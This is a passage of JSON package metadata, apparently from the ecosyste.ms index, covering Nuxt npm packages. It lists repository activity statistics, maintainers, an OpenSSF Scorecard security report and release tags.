99.066102591,"past_year_avg_time_to_close_pull_request":278153.12717852095,"past_year_issues_closed_count":1881,"past_year_pull_requests_closed_count":2121,"past_year_pull_request_authors_count":310,"past_year_issue_authors_count":1437,"past_year_avg_comments_per_issue":3.424954128440367,"past_year_avg_comments_per_pull_request":2.0623655913978496,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":949,"past_year_merged_pull_requests_count":1933,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":819,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":227,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"pi0","count":127,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"manniL","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"antfu","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"Atinux","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"Hebilicious","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"BobbieGoede","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"dargmuesli","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"warflash","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"ineshbose","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"farnabaz","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"madebyfabian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"lihbr","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"arashsheyda","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}],"active_maintainers":[{"login":"danielroe","count":497,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":153,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"manniL","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"userquin","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"BobbieGoede","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"pi0","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Atinux","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"madebyfabian","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"warflash","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"Hebilicious","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"arashsheyda","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fschema-nightly/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fschema-nightly/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fschema-nightly/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fschema-nightly/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fschema-nightly/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fschema-nightly/codemeta","maintainers":[{"uuid":"nuxt.bot","login":"nuxt.bot","name":null,"email":"pyapar+nuxtbot@gmail.com","url":null,"packages_count":22,"html_url":"https://www.npmjs.com/~nuxt.bot","role":null,"created_at":"2023-10-12T13:54:43.372Z","updated_at":"2023-10-12T13:54:43.372Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxt.bot/packages"},{"uuid":"pi0","login":"pi0","name":null,"email":"pyapar@gmail.com","url":null,"packages_count":689,"html_url":"https://www.npmjs.com/~pi0","role":null,"created_at":"2023-10-12T13:54:43.263Z","updated_at":"2023-10-12T13:54:43.263Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/pi0/packages"},{"uuid":"antfu","login":"antfu","name":null,"email":"anthonyfu117@hotmail.com","url":null,"packages_count":733,"html_url":"https://www.npmjs.com/~antfu","role":null,"created_at":"2023-10-12T13:54:43.186Z","updated_at":"2023-10-12T13:54:43.186Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/antfu/packages"},{"uuid":"atinux","login":"atinux","name":null,"email":"atinux@gmail.com","url":null,"packages_count":378,"html_url":"https://www.npmjs.com/~atinux","role":null,"created_at":"2023-10-12T13:54:43.226Z","updated_at":"2023-10-12T13:54:43.226Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/atinux/packages"},{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2023-10-12T13:54:43.332Z","updated_at":"2023-10-12T13:54:43.332Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"clarkdo","login":"clarkdo","name":null,"email":"clark.duxin@gmail.com","url":null,"packages_count":31,"html_url":"https://www.npmjs.com/~clarkdo","role":null,"created_at":"2023-10-12T13:54:43.298Z","updated_at":"2023-10-12T13:54:43.298Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/clarkdo/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-10-12T13:54:43.148Z","updated_at":"2023-10-12T13:54:43.148Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":11516416,"name":"@nuxt/docs-nightly","ecosystem":"npm","description":"Documentation for Nuxt in raw markdown","homepage":"https://nuxt.com","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":1233,"first_release_published_at":"2025-04-03T15:18:31.028Z","latest_release_published_at":"2025-04-03T15:18:31.028Z","latest_release_number":"0.0.0","last_synced_at":"2026-05-11T14:07:53.005Z","created_at":"2025-04-03T15:22:00.490Z","updated_at":"2026-05-11T14:13:41.971Z","registry_url":"https://www.npmjs.com/package/@nuxt/docs-nightly","install_command":"npm install @nuxt/docs-nightly","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"3x":"3.21.5-29640925.9fc42f78","5x":"5.0.0-29641806.e2b101c4","latest":"4.4.6-29641804.af09d0a7"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-05-06T23:06:53.000Z","size":137282,"stargazers_count":60168,"open_issues_count":884,"forks_count":5596,"subscribers_count":775,"default_branch":"main","last_synced_at":"2026-05-07T02:02:57.794Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-05-07T00:28:57.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":321,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32755991,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-07T02:14:30.463Z","status":"ssl_error","status_checked_at":"2026-05-07T02:14:29.405Z","response_time":62,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":64,"last_synced_at":"2026-05-03T05:32:00.401Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":118650,"followers":4625,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2026-05-03T05:32:00.402Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.21.5","sha":"86f23c4cdac794cf360bac4d15356b56a84fd683","kind":"commit","published_at":"2026-05-10T23:42:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.5/manifests"},{"name":"v4.4.5","sha":"08f34b5d9f263446354459b6227a8ae0d5ff8e9f","kind":"commit","published_at":"2026-05-10T23:42:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.5/manifests"},{"name":"v3.21.4","sha":"20abe11fcab0461633840ad8437be23406e996f7","kind":"commit","published_at":"2026-04-29T23:46:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.4/manifests"},{"name":"v4.4.4","sha":"7f8443d72d1c4bc8703d3ccf60c156d1335fda74","kind":"commit","published_at":"2026-04-29T23:45:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.4/manifests"},{"name":"v4.4.3","sha":"e177b61526bc8f0d6849bcc20708872cd1743e4f","kind":"commit","published_at":"2026-04-29T23:34:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.3/manifests"},{"name":"v3.21.3","sha":"7fbddddd19a17635d482eaa0361c811735e7baf7","kind":"commit","published_at":"2026-04-29T23:33:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.3/manifests"},{"name":"v4.4.2","sha":"d042505cbd096d68117cc13a9c29cf9c3fcb999b","kind":"commit","published_at":"2026-03-12T11:58:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.2/manifests"},{"name":"v4.4.1","sha":"7781701ad15238daef42a89e99f6bc33e738f40b","kind":"commit","published_at":"2026-03-12T11:43:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.1/manifests"},{"name":"v3.21.2